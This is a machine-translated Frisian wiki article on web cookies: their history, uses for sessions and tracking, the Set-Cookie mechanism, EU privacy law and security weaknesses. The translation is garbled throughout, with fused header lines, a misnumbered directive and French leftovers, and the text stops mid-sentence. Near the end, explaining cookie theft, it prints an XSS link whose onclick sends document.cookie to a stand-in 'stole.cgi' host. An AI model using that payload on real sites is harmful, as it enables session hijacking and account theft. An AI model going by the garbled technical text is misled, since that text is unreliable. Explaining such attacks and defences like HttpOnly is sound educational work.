in Definysjes, wiki

Ynternetkoekje: wat is it? Definysje, oarsprong, soarten en privacy

Wat is de rol fan in koekje, wat is it en wat binne de soarten cookies? 🍪

56.3k views 384 votes

Ynternetkoekje: wat is it? Definysje, oarsprong, soarten en privacy
Ynternetkoekje: wat is it? Definysje, oarsprong, soarten en privacy

Un koekje of webkoekje (of koekje, ôfkoarte as tsjûge yn Quebec) wurdt definiearre troch it HTTP-kommunikaasjeprotokol as in folchoarder fan ynformaasje stjoerd troch in HTTP-tsjinner nei in HTTP-kliïnt, dy't de lêste elke kear weromkomt as deselde HTTP-tsjinner ûnder bepaalde betingsten wurdt frege.

It koekje is it lykweardich fan in lyts tekstbestân opslein op 'e terminal fan de ynternetbrûker. Besteande foar mear dan 20 jier, se tastean webside-ûntwikkelders brûkersgegevens op te slaan om har navigaasje te fasilitearjen en bepaalde funksjonaliteiten te tastean. Koekjes hawwe altyd mear of minder kontroversjeel west, om't se oerbleaune persoanlike ynformaasje befetsje dy't mooglik troch tredden brûkt wurde kinne.

It wurdt stjoerd as in HTTP-header troch de webtsjinner nei de webblêder dy't it elke kear as it tagong jout ta de tsjinner ûnferoare werombringt. In koekje kin brûkt wurde om in autentikaasje, in sesje (state ûnderhâld), en foar bewarje spesifike ynformaasje oer de brûker, lykas sidefoarkarren of de ynhâld fan in elektroanyske winkelkarre. De term koekje is ôflaat fan magysk koekje, in bekend konsept yn UNIX-komputerjen, dy't it idee en de namme fan browserkoekjes ynspireare. In pear alternativen foar cookies besteane, elk mei har eigen gebrûk, foardielen en neidielen.

As ienfâldige tekstbestannen binne cookies net útfierber. Sy binne net noch spyware noch firussen, hoewol koekjes fan guon siden wurde ûntdutsen troch in protte anty-firussoftware, om't se brûkers kinne folgje as se meardere siden besykje. 

De measte moderne browsers tastean brûkers ta beslute oft jo cookies akseptearje of ôfwize. Brûkers kinne ek kieze hoe lang koekjes wurde opslein. De folsleine ôfwizing fan cookies makket lykwols guon siden ûnbrûkber. Bewarje bygelyks winkelkarren of siden dy't ynlogge nedich binne mei bewiisbrieven (brûkersnamme en wachtwurd).

Ynhâld ynhâld

historique

De term koekje komt fan 'e Ingelske term magysk koekje, dat is in pakket fan gegevens dat in programma ûntfangt en jout net feroare. Koekjes waarden al brûkt yn IT wannear Lou Montulli hie it idee om se te brûken yn webkommunikaasje yn juny 1994. Op dat stuit wie hy wurksum by Netscape Communications, dy't in e-commerce-applikaasje foar in klant ûntwikkele hie. Koekjes joegen in oplossing foar it probleem fan 'e betrouberens fan' e ymplemintaasje fan 'e firtuele winkelkarre fan in winkel.

John Giannandrea en Lou Montulli skreaunen datselde jier de earste cookie-spesifikaasje fan Netscape. Ferzje 0.9 beta fan Mosaic Netscape, útbrocht op 13 oktober 1994, yntegreare cookie technology (sjo post). It earste (net-eksperimintele) gebrûk fan cookies wie om te bepalen oft besikers fan de webside fan Netscape de side earder besocht hawwe. Montulli yntsjinne in oktroaioanfraach foar cookie technology yn 1995, en US patint 5774670 waard ferliend. ferliend yn 1998.

Nei ymplemintaasje yn Netscape 0.9 beta yn 1994, waarden cookies yntegrearre yn Internet Explorer 2, útbrocht yn oktober 1995.

De ynfiering fan cookies is noch net breed bekend by it publyk. Foaral cookies waarden standert akseptearre yn browserynstellingen, en brûkers waarden net ynformearre oer har oanwêzigens. Guon minsken wiene op 'e hichte fan it bestean fan koekjes om it earste fearnsjier fan 1995 hinne, mar it grutte publyk naam har bestean pas nei't de Financial Times in artikel publisearre op 12 febrewaris 1996. Yn datselde jier krigen koekjes in soad media-oandacht fanwege mooglike privacy-ynbraken. It ûnderwerp fan cookies waard besprutsen yn twa oerlis fan 'e American Federal Trade Commission yn 1996 en 1997.

De ûntwikkeling fan de offisjele cookie-spesifikaasje wie al oan 'e gong. De earste diskusjes fan 'e offisjele spesifikaasje fûnen plak yn april 1995 op' e www-talk-mailinglist. In spesjale IETF-wurkgroep waard foarme. Twa alternative foarstellen foar it yntrodusearjen fan steat oan HTTP-transaksjes waarden foarsteld troch respektivelik Brian Behlendorf en David Kristol, mar de groep, ûnder lieding fan Kristol sels, besleat de spesifikaasje fan Netscape as útgongspunt te brûken. Yn febrewaris 1996 hat de wurkgroep bepaald dat cookies fan tredden in wichtige bedriging foar privacy wiene. De spesifikaasje produsearre troch de groep waard úteinlik publisearre as RFC 2109.

Fan 'e ein fan 2014 sjogge wy in banner oer cookies op in protte siden. Der is op syn minst ien browser tafoeging wêrmei de banner net werjûn.

Soarten koekjes en gebrûk

Sesje behear

Koekjes kinne brûkt wurde om brûkersgegevens by navigaasje te behâlden, mar ek by meardere besites. Koekjes waarden yntrodusearre om in middel te jaan foar it ymplementearjen fan elektroanyske winkelkarren, in firtuele apparaat wêryn de brûker de items kin sammelje dy't hy wol keapje by it blêdzjen fan 'e side.

Dizze dagen bewarje apps lykas winkelkarren ynstee de list fan items yn in databank op in tsjinner, wat de foarkar is; dan bewarje se yn it koekje sels. De webtsjinner stjoert in koekje mei in unike sesje-ID. De webblêder jout dan dizze sesje-ID op elk folgjende fersyk werom en de items yn 'e koer wurde bewarre en ferbûn mei deselde unike sesje-ID.

Faak gebrûk fan cookies is nuttich foar it ynloggen op in side mei help fan bewiisbrieven. Koartsein, de webserver stjoert earst in koekje mei in unike sesje-ID. Dan jouwe brûkers har referinsjes (meastal in brûkersnamme en wachtwurd). De webapplikaasje ferifiearret dan de sesje en lit de brûker tagong krije ta de tsjinst.

personalization

Cookies kinne brûkt wurde om ynformaasje te ûnthâlden oer de brûker fan in side, om him yn 'e takomst passende ynhâld te sjen. Bygelyks, in webtsjinner kin in koekje stjoere mei de lêste brûkersnamme dy't brûkt is om yn te loggen op dy webside, sadat dizze brûkersnamme foarbefolke wurde kin by takomstige besites.

In protte websiden brûke cookies foar personalisaasje basearre op brûkersfoarkarren. Brûkers selektearje harren foarkar yn in formulier en stjoere dizze oan de tsjinner. De tsjinner kodearret de foarkar yn in koekje en stjoert it werom nei de browser. Ferfolgens, elke kear as de brûker tagong hat ta in side fan dizze side, jout de browser it koekje werom en dus de list mei foarkarren; de tsjinner kin dan de side oanpasse neffens de foarkar fan de brûker. Bygelyks, de webside fan Wikipedia lit har brûkers de hûd kieze fan 'e side dy't se leaver hawwe. De sykmasjine fan Google lit syn brûkers (sels as se net registrearre binne) it oantal resultaten kieze dat se op elke resultaatside sjen wolle.

Tracking

Trackingcookies wurde brûkt om de blêdzjegewoanten fan ynternetbrûkers te folgjen. Dit kin ek foar in part dien wurde troch it IP-adres te brûken fan 'e kompjûter dy't in fersyk foar in side docht of troch de 'referrer' HTTP-header te brûken dy't de kliïnt by elke oanfraach ferstjoert, mar cookies meitsje foar gruttere presyzje. Dit kin dien wurde lykas yn it folgjende foarbyld:

  1. As de brûker in side op in side opropt, en it fersyk befettet gjin koekje, giet de tsjinner der fanút dat dit de earste side is dy't de brûker besocht. De tsjinner makket dan in willekeurige tekenrige en stjoert it nei de browser tegearre mei de frege side.
  2. Fan dit momint ôf sil it koekje automatysk troch de browser ferstjoerd wurde elke kear as in nije side fan 'e side wurdt oanroppen. De tsjinner sil de side lykas gewoanlik stjoere, mar sil ek de URL fan 'e side neamd, de datum, tiid fan it fersyk en it koekje yn in lochbestân oanmelde.

Troch it lochbestân te besjen is it dan mooglik om te sjen hokker siden de brûker besocht hat en yn hokker folchoarder. As it bestân bygelyks in pear oanfragen befettet makke mei it id=abc-koekje, kin dit fêststelle dat al dizze oanfragen fan deselde brûker komme. De oanfrege URL, de datum en tiid ferbûn mei de oanfragen kinne it blêdzjen fan de brûker folgje.

Cookies en webbakens fan tredden, hjirûnder útlein, skeakelje ek tracking oer ferskate siden yn. Single site tracking wurdt algemien brûkt foar statistyske doelen. Yn tsjinstelling, tracking oer ferskate siden mei koekjes fan tredden wurdt yn 't algemien brûkt troch reklamebedriuwen om anonime brûkersprofilen te produsearjen (dy't dan wurde brûkt om te bepalen hokker advertinsjes moatte wurde toand oan de brûker en ek om him e-mails te stjoeren dy't oerienkomme mei dizze advertinsjes - SPAM ).

Cookies folgjen binne in risiko fan ynvaazje fan brûkersprivacy, mar se kinne maklik wurde wiske. De measte moderne browsers befetsje in opsje om persistente cookies automatysk te wiskjen by it sluten fan de applikaasje.

Cookies fan tredden

Ofbyldings en oare objekten op in webside kinne lizze op oare servers as dejinge dy't de side host. Om de side wer te jaan, downloadt de browser al dizze objekten. De measte websiden befetsje ynformaasje út ferskate boarnen. As jo ​​bygelyks www.example.com yn jo blêder ynfiere, sille d'r faaks objekten of advertinsjes op in diel fan 'e side wêze dy't út oare boarnen komme, dus fan in oar domein as www. .example.com. Cookies fan 'earste' binne cookies dy't ynsteld binne troch it domein dat yn 'e adresbalke fan 'e browser stiet. Cookies fan tredden wurde ynsteld troch ien fan 'e side-objekten dy't fan in oar domein komt.

Standert akseptearje browsers lykas Mozilla Firefox, Microsoft Internet Explorer en Opera cookies fan tredden, mar brûkers kinne de ynstellings yn browseropsjes feroarje om se te blokkearjen. D'r is gjin feiligensrisiko ynherinte oan cookies fan tredden dy't webfunksjonaliteit ynskeakelje, se wurde lykwols ek brûkt om brûkers te folgjen. fan side nei side.

Tools lykas Ghostery beskikber foar alle browsers ynklusyf Google Chrome kinne útwikselingen tusken tredden blokkearje.

Útfiering

In mooglike ynteraksje tusken in webblêder en de tsjinner dy't de webside host. De tsjinner stjoert in koekje nei de browser en de browser stjoert it werom as it in oare side ropt.
In mooglike ynteraksje tusken in webblêder en de tsjinner dy't de webside host. De tsjinner stjoert in koekje nei de browser en de browser stjoert it werom as it in oare side ropt.

Koekjes binne lytse stikjes gegevens dy't troch de webtsjinner nei de browser stjoerd wurde. De browser jout se ûnferoare werom nei de tsjinner, en yntrodusearret steat (ûnthâld oan ferline eveneminten) yn 'e oars steatleaze HTTP-transaksje. Sûnder cookies is elke opheljen fan in webside of in komponint fan in webside in isolearre barren, ûnôfhinklik fan oare oanfragen dy't op deselde side makke binne. Neist it ynstellen fan 'e webserver, kinne cookies ek ynsteld wurde troch skripttalen lykas JavaScript, as stipe en autorisearre troch de browser.

De offisjele cookie-spesifikaasje suggerearret dat browsers in minimum oantal cookies kinne bewarje en opnij ferstjoere. Spesifyk soe in browser op syn minst 300 cookies fan elk fjouwer kilobytes moatte kinne opslaan, en op syn minst 20 cookies foar ien server of domein.

Neffens paragraaf 3.1 fan RFC 2965, koekje nammen binne net-gefoelige.

In koekje kin de datum fan it ferrinnen oantsjutte, yn dat gefal sil it koekje op dizze datum wiske wurde. As it koekje gjin ferfaldatum oantsjut, wurdt it koekje wiske sa gau as de brûker syn browser ferlit. Dêrom is it opjaan fan in ferfaldatum in manier om it koekje te oerlibjen troch meardere sesjes. Om dizze reden wurde koekjes mei in ferfaldatum sein oanhâldend. In foarbyldapplikaasje: in retailside kin persistente cookies brûke om de items op te nimmen dy't brûkers yn har winkelkarre pleatst hawwe (yn werklikheid kin it koekje ferwize nei in yngong bewarre yn in databank op 'e side fan ferkeap, en net op jo kompjûter) . Troch dit middel, as brûkers har blêder ferlitte sûnder in oankeap te meitsjen en letter weromkomme, kinne se de items yn 'e karre wer fine. As dizze koekjes joegen gjin ferfaldatum, se ferrinne doe't de browser waard sletten, en de ynformaasje oer de ynhâld fan 'e koer soe ferlern gean.

Cookies kinne wurde beheind yn omfang ta in spesifyk domein, subdomain of paad op de tsjinner dy't makke se.

De oerdracht fan websiden wurdt dien mei it HyperText Transfer Protocol (HTTP). Troch koekjes te negearjen, neame browsers in side fan webservers troch har algemien in koarte tekst te stjoeren neamd HTTP fersyk. Bygelyks, om tagong te krijen ta de side www.example.org/index.html, ferbine browsers mei de tsjinner www.example.org en stjoere in fersyk dat der sa útsjocht:

GET /index.html HTTP/1.1Host: www.example.org
navigateurtsjinner

De tsjinner reagearret troch it ferstjoeren fan de frege side, foarôfgien troch in ferlykbere tekst, it hiele wêzen neamd HTTP antwurd. Dit pakket kin rigels befetsje dy't de browser ynstruearje om cookies op te slaan:

HTTP/1.1 200 OKContent-type: text/htmlSet-Cookie: namme=wearde
(HTML-side)
navigateurtsjinner

De tsjinner stjoert allinich de Set-Cookie-rigel, as de tsjinner wol dat de browser in koekje opslaan. Set-Cookie is in fersyk foar de browser om de namme=wearde-string op te slaan en it yn alle takomstige oanfragen werom te jaan oan de tsjinner. As de blêder koekjes stipet en koekjes binne ynskeakele yn 'e browseropsjes, sil it koekje opnommen wurde yn alle folgjende oanfragen dy't oan deselde tsjinner binne makke. Bygelyks, de browser neamt de side www.example.org/news.html troch it folgjende fersyk nei de server www.example.org te stjoeren:

GET /news.html HTTP/1.1Host: www.example.orgCookie: namme=wearde Akseptearje: */*
navigateurtsjinner

Dit is in fersyk foar in oare side fan deselde tsjinner, en ferskilt fan de earste hjirboppe om't it in tekenrige befettet dy't de tsjinner earder nei de blêder stjoerd hat. Mei tank oan dit middel wit de tsjinner dat dit fersyk keppele is oan it foarige. De tsjinner reagearret troch it ferstjoeren fan de oproppen side, en ek troch it tafoegjen fan oare cookies.

De wearde fan it koekje kin wizige wurde troch de tsjinner troch in nije rigel te stjoeren Set-Cookie: name=new_value yn reaksje op de oproppen side. De browser ferfangt dan de âlde wearde mei de nije.

De line Set-Cookie wurdt normaal makke troch in CGI-programma of oare skripttaal, net troch de HTTP-tsjinner. De HTTP-tsjinner (foarbyld: Apache) sil allinich it resultaat fan it programma (in dokumint foarôfgeand troch de koptekst mei de cookies) nei de browser stjoere.

Koekjes kinne ek ynsteld wurde troch JavaSkript of oare ferlykbere talen dy't rinne yn 'e blêder, dat wol sizze oan' e kliïntside ynstee fan 'e serverkant. Yn JavaScript wurdt it document.cookie-objekt foar dit doel brûkt. Bygelyks, de ferklearring document.cookie = "temperatuer=20" makket in koekje mei de namme "temperatuer" en mei in wearde fan 20.

Foarbyld fan in HTTP-antwurd fan google.com, dy't in koekje ynstelt mei attributen.
Foarbyld fan in HTTP-antwurd fan google.com, dy't in koekje ynstelt mei attributen.

Njonken it namme/wearde-pear kin in koekje ek in ferfaldatum, in paad, in domeinnamme en it bedoelde type ferbining befetsje, dus normaal of fersifere. RFC 2965 ek definiearret dat cookies moatte hawwe in ferplichte ferzje nûmer, mar dit wurdt oer it algemien weilitten. Dizze gegevensdielen folgje it pear namme = new_value en wurde skieden troch puntkomma's. Bygelyks, in koekje kin makke wurde troch de tsjinner troch it stjoeren fan in Set-Cookie-rigel: namme=nije_wearde; expires=datum; paad =/; domain=.example.org.

Cookies ferrinne en wurde dan net troch de browser nei de tsjinner stjoerd yn de folgjende situaasjes:

  • As de browser is sletten, as it koekje is net persistent.
  • Wannear't de cookie ferfaldatum is foarby.
  • Wannear't de cookie ferfaldatum wurdt feroare (troch de tsjinner of it skript) nei in datum yn it ferline.
  • As de browser it koekje wisket op fersyk fan de brûker.

De tredde situaasje lit tsjinners of skripts in koekje eksplisyt wiskje. Tink derom dat it mooglik is mei de Google Chrome-webbrowser de ferfaldatum fan in bepaalde koekje te witten troch tagong te krijen ta de ynhâldynstellingen. In koekje dat op in komputer bewarre is, kin der wol ferskate desennia bliuwe as der gjin proseduere wurdt nommen om it te wiskjen.

Stereotypen

Sûnt har yntroduksje op it ynternet binne in protte ideeën oer cookies sirkulearre op it ynternet en yn 'e media. Yn 1998, CIAC, in team foar monitoring fan kompjûterynsidinten fan 'e Feriene Steaten fan' e Enerzjy, bepaalde dat kwetsberens foar cookie-feiligens "yn wêzen net bestean" wiene en ferklearre dat "ynformaasje oer de oarsprong fan jo besites en de details fan 'e websiden dy't jo hawwe besocht bestean al yn de logtriemmen fan de webservers”. Yn 2005 publisearre Jupiter Research de resultaten fan in stúdzje, wêryn in signifikant persintaazje fan respondinten de folgjende útspraken beskôge:

  • Koekjes binne lykas firus, se ynfektearje de hurde skiven fan brûkers.
  • Cookies generearje opdûke.
  • Cookies wurde brûkt om te ferstjoeren ûnpost.
  • Koekjes wurde allinnich brûkt foar reklame.

Koekjes kinne gjin ynformaasje wiskje of lêze fan 'e kompjûter fan de brûker. Cookies meitsje it lykwols mooglik om de websiden te ûntdekken dy't troch in brûker besocht wurde op in bepaalde side of set fan siden. Dizze ynformaasje kin wurde sammele yn in brûkersprofyl dat kin wurde brûkt of trochferkocht oan tredden, wat serieuze privacyproblemen kin opleverje. Guon profilen binne anonym, yn 'e sin dat se gjin persoanlike ynformaasje befetsje, mar sels sokke profilen kinne twifelich wêze.

Neffens deselde stúdzje wit in grut persintaazje ynternetbrûkers net hoe't se cookies wiskje. Ien fan 'e redenen wêrom't minsken cookies net fertrouwe is dat guon siden it persoanlik identifisearjende aspekt fan cookies misbrûkt hawwe en dizze ynformaasje dield hawwe mei oare boarnen. In grut persintaazje fan rjochte reklame en net frege e-post, beskôge as spam, komt fan ynformaasje sammele út tracking cookies.

Browser ynstellings

De measte browsers stypje cookies en lit de brûker se útskeakelje. De meast foarkommende opsjes binne:

  • Skeakelje cookies folslein yn of út, sadat se konstant aksepteare of blokkeare wurde.
  • Lit de brûker de aktive koekjes sjen op in opjûne side, troch javascript: alert(document.cookie) yn te fieren yn 'e adresbalke fan' e browser. Guon browsers omfetsje in cookie-manager foar de brûker dy't cookies kin besjen en selektyf wiskje dy't op it stuit troch de browser opslein binne.

De measte browsers tastean ek folsleine wiskjen fan persoanlike gegevens mei koekjes. Oanfoljende modules besteane ek om tastimmingen foar cookie te kontrolearjen.

Privacy en koekjes fan tredden

Yn dit fiktive foarbyld hat in reklamebedriuw banners pleatst op twa websiden. Troch de banners op har servers te hostjen en cookies fan tredden te brûken, is it reklamebedriuw yn steat om de navigaasje fan de brûker fia dizze twa siden te folgjen.

Cookies hawwe wichtige gefolgen foar de privacy en anonimiteit fan webbrûkers. Hoewol't cookies allinich weromstjoerd wurde nei de server dy't se ynsteld hawwe of nei in server dy't ta itselde ynternetdomein heart, kin in webside lykwols ôfbyldings of oare komponinten befetsje dy't opslein binne op servers dy't ta oare domeinen hearre. De cookies dy't ynsteld binne by it herstel fan dizze eksterne komponinten wurde neamd cookies fan tredden. Dit omfettet cookies fan net winske pop-upfinsters.

Reklamebedriuwen brûke cookies fan tredden om brûkers te folgjen oer de ferskate siden dy't se besykje. Benammen in reklamebedriuw kin in brûker folgje oer alle siden wêr't it reklameôfbyldings of in trackingpiksel pleatst hat. Kennis fan 'e siden besocht troch de brûker lit it reklamebedriuw de reklamefoarkarren fan' e brûker rjochtsje.

De mooglikheid om in brûkersprofyl te bouwen wurdt troch guon beskôge as in privacy-ynfal, benammen as it folgjen wurdt dien oer ferskate domeinen mei cookies fan tredden. Om dizze reden hawwe guon lannen koekjeswetjouwing.

De regearing fan 'e Feriene Steaten ymplementearre yn 2000 strange regels oer it pleatsen fan koekjes, nei't bliken dien wie dat it Drug Policy Office fan it Wite Hûs cookies brûkte om de kompjûters te folgjen fan brûkers dy't online drugsadvertinsjes besjen. Yn 2002 ûntdekte privacy-aktivist Daniel Brandt dat de CIA persistente koekjes liet op kompjûters dy't har websiden besocht hiene. Ienris ynformearre oer dizze ynbreuk, ferklearre de CIA dat dizze koekjes net mei opsetsin stjoerd waarden en stoppe se yn te stellen. Op 25 desimber 2005 ûntduts Brandt dat de National Security Agency (NSA) twa persistente koekjes op de kompjûters fan besikers efterlitten hie fanwegen in software-update. Nei't se op 'e hichte wiene, hat de NSA koekjes fuortendaliks útskeakele.

Yn it Feriene Keninkryk, de Cookie wet ", yngien op maaie 25, 2012, ferplichtet de siden om har bedoelingen te ferklearjen, sadat de brûkers kinne kieze oft se spoaren of net wolle litte fan har passaazje op ynternet. Se kinne sa wurde beskerme tsjin reklame-targeting. Lykwols, neffens De wachter, de tastimming fan ynternetbrûkers is net needsaaklik eksplisyt; feroarings binne makke oan de betingsten fan tastimming fan brûkers, wêrtroch't it dus ymplisearre.

Rjochtline 2002/58 oer privacy

Rjochtline 202/58 privacy en elektroanyske kommunikaasje, befettet regels oer it brûken fan cookies. Benammen artikel 5, paragraaf 3 fan dizze rjochtline fereasket dat de opslach fan gegevens (lykas koekjes) op de kompjûter fan de brûker allinnich kin dien wurde as:

  • de brûker wurdt ynformearre oer hoe't de gegevens brûkt wurde;
  • de brûker wurdt jûn de opsje fan it wegerjen fan dizze opslach operaasje. Dit artikel stelt lykwols ek dat de opslach fan gegevens om technyske redenen frijsteld is fan dizze wet.

De rjochtline, dy't fan oktober 2003 ôf ymplemintearre wurde soe, waard lykwols mar hiel ûnfolslein yn 'e praktyk brocht neffens in rapport fan desimber 2004, dêr't ek op wiisde dat bepaalde lidsteaten (Slowakije, Letlân, Grikelân, Belgje en Lúksemboarch) noch net omset hiene rjochtline yn binnenlânsk rjocht.

Neffens de miening fan 'e G29 yn 2010, bliuwt dizze rjochtline, dy't benammen it gebrûk fan cookies foar gedrachsreklamedoelen betinget, oer de eksplisite tastimming fan 'e ynternetbrûker tige min tapast. Yn feite dogge de measte siden dat op in manier dy't net foldocht oan de rjochtline, troch harsels te beheinen ta in ienfâldige "banner" dy't ynformearret oer it brûken fan "koekjes" sûnder ynformaasje te jaan oer it gebrûk, sûnder ûnderskied te meitsjen tusken "technyske" cookies. "tracking" koekjes, noch om in echte kar te bieden oan de brûker dy't technyske koekjes behâlde wol (lykas koekjes foar winkelkarrebehear) en "tracking" cookies wegerje. Eins wurkje in protte siden net goed as cookies wurde wegere, wat net foldocht oan rjochtline 2002/58 of rjochtline 95/46 (Beskerming fan persoanlike gegevens).

Rjochtline 2009/136/CE

Dit materiaal is bywurke troch Rjochtline 2009/136/EC fan 25 novimber 2009, dy't stelt dat de "opslach fan ynformaasje, of it krijen fan tagong ta ynformaasje dy't al is opslein, yn 'e terminalapparatuer fan in abonnee of brûker allinich tastien is op betingst dat de abonnee of brûker hat syn tastimming jûn, nei't er, yn oerienstimming mei Rjochtline 95/46/EC, dúdlike en folsleine ynformaasje krigen hat tusken oaren oer de doelen fan 'e ferwurking. De nije rjochtline fersterket dêrom de ferplichtings foarôfgeand oan it pleatsen fan cookies op de kompjûter fan 'e ynternetbrûker.

Yn 'e foarriedige oerwagings fan' e rjochtline spesifisearret de Jeropeeske wetjouwer lykwols: "Wêr't technysk mooglik en effektyf, yn oerienstimming mei de oanbelangjende bepalingen fan 'e rjochtline 95/46/EC, kin de tastimming fan 'e brûker oangeande de ferwurking útdrukt wurde fia de gebrûk fan de passende ynstellings fan in browser of oare applikaasje”. Mar feitlik makket gjin browser oant no ta it mooglik om de essensjele technyske cookies te skieden fan de opsjonele dy't moatte wurde oerlitten oan de kar fan de brûker.

Dizze nije rjochtline waard omset troch Belgyske parlemintsleden yn july 2012. In stúdzje út 2014 lit sjen dat sels parlemintsleden muoite hawwe om oan te freegjen de beheiningen fan 'e rjochtline.

P3P

De P3P-spesifikaasje omfettet de mooglikheid foar in server om in privacybelied oan te jaan, dat definiearret hokker soarte ynformaasje it sammelet en foar hokker doel. Dit belied omfettet (mar is net beheind ta) it brûken fan ynformaasje sammele mei cookies. Neffens de definysjes fan P3P kin in browser cookies akseptearje of wegerje troch it privacybelied te fergelykjen mei de foarkar fan de brûker of troch de brûker te freegjen, de privacybeliedsferklearring te presintearjen dy't troch de tsjinner ferklearre is.

In protte browsers, ynklusyf Apple Safari en Microsoft Internet Explorer ferzjes 6 en 7, stypje P3P wêrtroch de blêder kin bepale oft it koekje opslach fan tredden akseptearret. De Opera-blêder lit brûkers cookies fan tredden wegerje en in globaal en spesifyk befeiligingsprofyl meitsje foar ynternetdomeinen. Mozilla Firefox ferzje 2 foel P3P-stipe ôf, mar stelde it werom yn ferzje 3.

Cookies fan tredden kinne troch de measte browsers blokkearre wurde om privacy te fergrutsjen en advertinsjetracking te ferminderjen, sûnder de webûnderfining fan 'e brûker negatyf te beynfloedzjen. In protte reklameburo's biede in opsje ôfmelde ta doelbewuste reklame, troch it ynstellen fan in generysk koekje yn 'e blêder dy't dizze targeting deaktivearret, mar sa'n oplossing is net praktysk effektyf, as it wurdt respektearre, om't dit generyske koekje wurdt wiske sa gau as de brûker dizze cookies wisket, wat de opt annulearret út beslút.

Neidielen fan koekjes

Neist privacyproblemen hawwe cookies ek wat technyske neidielen. Benammen se identifisearje brûkers net altyd sekuer, se kinne sideprestaasjes fertrage as se yn grutte oantallen kinne wurde brûkt foar feiligensoanfallen, en se konflikt mei de represintative steatferfier, arsjitektoanyske styl fan 'e software.

Unprecise identifikaasje

As mear as ien browser wurdt brûkt op in kompjûter, yn elk fan harren is altyd in aparte opslach ienheid foar cookies. Cookies identifisearje dus gjin persoan, mar de kombinaasje fan in brûkersaccount, in kompjûter en in webblêder. Sa kin elkenien dizze akkounts, kompjûters of browsers brûke dy't it panopol fan cookies hawwe. Op deselde manier meitsje cookies gjin ûnderskied tusken meardere brûkers dy't deselde brûkersaccount, komputer en browser diele, lykas yn "ynternetkafes" of op elk plak dat fergees tagong jout ta kompjûterboarnen.

Mar yn 'e praktyk blykt dizze útspraak yn 'e mearderheid fan 'e gefallen falsk te wêzen, om't hjoeddedei in "persoanlike" kompjûter (of in smartphone, of tablet, wat slimmer is) benammen troch ien yndividu brûkt wurdt. troch it folume fan sammele ynformaasje komme ta personaliseare doelen, sels as de persoan net "namlik" is identifisearre.

In koekje kin stellen wurde troch in oare kompjûter op it netwurk.

Under normale operaasje wurde cookies weromstjoerd tusken de tsjinner (of in groep servers yn itselde domein) en de kompjûterbrowser fan de brûker. Om't cookies gefoelige ynformaasje kinne befetsje (brûkersnamme, in wachtwurd brûkt foar autentikaasje, ensfh.), Soe har wearden net tagonklik wêze foar oare kompjûters. Cookie stellerij is in hanneling fan ûnderskepping fan cookies troch in net autorisearre tredde partij.

Cookies kinne stellen wurde fia in pakket sniffer yn in oanfal neamd sesje kaping. Ferkear op it net kin wurde ûnderskept en lêzen troch oare kompjûters as dy dy't ferstjoere en ûntfange (benammen op 'e net-fersifere iepenbiere Wi-Fi-romte). Dit ferkear omfettet cookies ferstjoerd oer sesjes mei it gewoane HTTP-protokol. As netwurkferkear net fersifere is, kinne kweade brûkers sa de kommunikaasje fan oare brûkers op it netwurk lêze mei "pakket sniffers".

Dit probleem kin oerwûn wurde troch it fersiferjen fan de ferbining tusken de kompjûter fan de brûker en de server mei it HTTPS-protokol. In tsjinner kin oantsjutte a feilige flagge wylst it ynstellen fan in koekje; de browser stjoert it allinich oer in feilige line, lykas in SSL-ferbining.

Lykwols, in protte siden, hoewol it brûken fan HTTPS-fersifere kommunikaasje foar brûkersautentikaasje (dus de oanmeldside), stjoere letter sesjekoekjes en oare gegevens as normaal, fia net-fersifere HTTP-ferbiningen foar effisjinsjeredenen. Oanfallers kinne sa koekjes fan oare brûkers ûnderskeppe en har foardogge op passende siden of brûke se yn cookie-oanfallen.

Skript op 'e side: in koekje dat allinich útwiksele wurde moat tusken de tsjinner en de kliïnt wurdt stjoerd nei in oare tredde partij.

In oare manier om cookies te stellen is om siden te skripten en de browser sels cookies te stjoeren nei kweade servers dy't se noait ûntfange. Moderne browsers tastean útfiering fan socht dielen fan koade fan de tsjinner. As cookies tagong wurde tidens runtime, kinne har wearden yn ien of oare foarm wurde kommunisearre oan servers dy't der gjin tagong ta moatte. Koekjes fersiferje foardat se oer it netwurk ferstjoerd wurde, helpt de oanfal net tsjin te gean.

Dit type skripting op 'e side wurdt typysk brûkt troch oanfallers op siden wêrmei brûkers HTML-ynhâld kinne pleatse. Troch it yntegrearjen fan in diel fan kompatibele koade yn 'e HTML-bydrage, kin in oanfaller cookies ûntfange fan oare brûkers. Kennis fan dizze koekjes kin brûkt wurde troch ferbining te meitsjen mei deselde side mei de stellen koekjes, sadat se erkend wurde as de brûker waans koekjes stellen binne.

Ien manier om sokke oanfallen te foarkommen is de HttpOnly-flagge te brûken; it is in opsje, yntrodusearre sûnt ferzje 6 fan Internet Explorer yn PHP sûnt ferzje 5.2.0 dy't pland is om it koekje net tagonklik te meitsjen foar de kliïnt tichtby it skript. Webûntwikkelders moatte dit lykwols rekken hâlde yn har side-ûntwikkeling, sadat se ymmún binne foar skripting op 'e side.

In oare feiligens bedriging brûkt is fraach fabrication yn 'e side.

De offisjele technyske spesifikaasje lit cookies allinich weromstjoerd wurde nei servers yn it domein wêrfan se ûntstien binne. De wearde fan cookies kin lykwols nei oare servers stjoerd wurde mei oare middels as koekjekoppen.

Benammen skripttalen lykas JavaScript binne oer it algemien tastien om tagong te krijen ta cookiewearden en binne yn steat om willekeurige wearden nei elke server op it ynternet te stjoeren. Dizze skriptmooglikheid wurdt brûkt fan websiden wêrtroch brûkers HTML-ynhâld kinne pleatse foar oare brûkers om te besjen.

Bygelyks, in oanfaller dy't wurket op it example.com-domein kin in reaksje pleatse mei de folgjende keppeling dy't ferwiist nei in populêr blog dat se oars net kontrolearje:

<a href="#" onclick="window.location = 'http://exemple.com/stole.cgi?text=' + escape(document.cookie); return false;">Cliquez ici !</a>

As in oare brûker op dizze keppeling klikt, fiert de browser it onclick-attribút diel fan 'e koade út, sadat it de document.cookie-string ferfangt mei de list mei brûkerskoekjes dy't aktyf binne foar dizze side. Dêrom wurdt dizze list mei cookies stjoerd nei de example.com-tsjinner, en de oanfaller kin dêrom de cookies fan dizze brûker sammelje.

Dit soarte oanfal is lestich te ûntdekken oan 'e brûkerskant, om't it skript komt fan itselde domein dat it koekje ynstelde, en de operaasje om de wearden te ferstjoeren liket te wêzen autorisearre troch dat domein. It wurdt beskôge dat it de ferantwurdlikens is fan 'e behearders dy't dit type side operearje om beheiningen yn te stellen dy't de publikaasje fan kweade koade foarkomme.

Koekjes binne net direkt sichtber foar programma's oan 'e kant fan' e kliïnt lykas JavaScript as se stjoerd binne mei de HttpOnly-flagge. Fanút it eachpunt fan 'e tsjinner is it ienige ferskil dat yn' e line fan 'e koptekst Set-Cookie in nij fjild is tafoege mei de tekenrige HttpOnly:

